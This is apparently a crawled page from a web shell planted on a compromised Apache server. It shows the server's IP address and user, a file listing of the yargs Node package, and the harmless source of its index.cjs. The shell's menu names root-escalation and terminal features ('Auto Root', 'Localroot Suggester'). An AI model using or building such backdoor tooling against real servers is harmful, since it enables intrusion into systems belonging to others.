Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
nodejs /
yargs /
Delete
Unzip
Name
Size
Permission
Date
Action
build
[ DIR ]
drwxr-xr-x
2023-12-23 20:12
helpers
[ DIR ]
drwxr-xr-x
2023-12-23 20:12
lib
[ DIR ]
drwxr-xr-x
2023-12-23 20:12
locales
[ DIR ]
drwxr-xr-x
2023-12-23 20:12
browser.mjs
234
B
-rw-r--r--
2022-12-01 14:49
index.cjs
1.04
KB
-rw-r--r--
2022-12-01 14:49
index.mjs
233
B
-rw-r--r--
2022-12-01 14:49
package.json
3.03
KB
-rw-r--r--
2022-12-01 14:49
yargs
457
B
-rw-r--r--
2022-12-01 14:49
Save
Rename
// TODO: consolidate on using a helpers file at some point in the future, which // is the approach currently used to export Parser and applyExtends for ESM: const {applyExtends, cjsPlatformShim, Parser, Yargs, processArgv} = require('./build/index.cjs') Yargs.applyExtends = (config, cwd, mergeExtends) => { return applyExtends(config, cwd, mergeExtends, cjsPlatformShim) } Yargs.hideBin = processArgv.hideBin Yargs.Parser = Parser module.exports = Yargs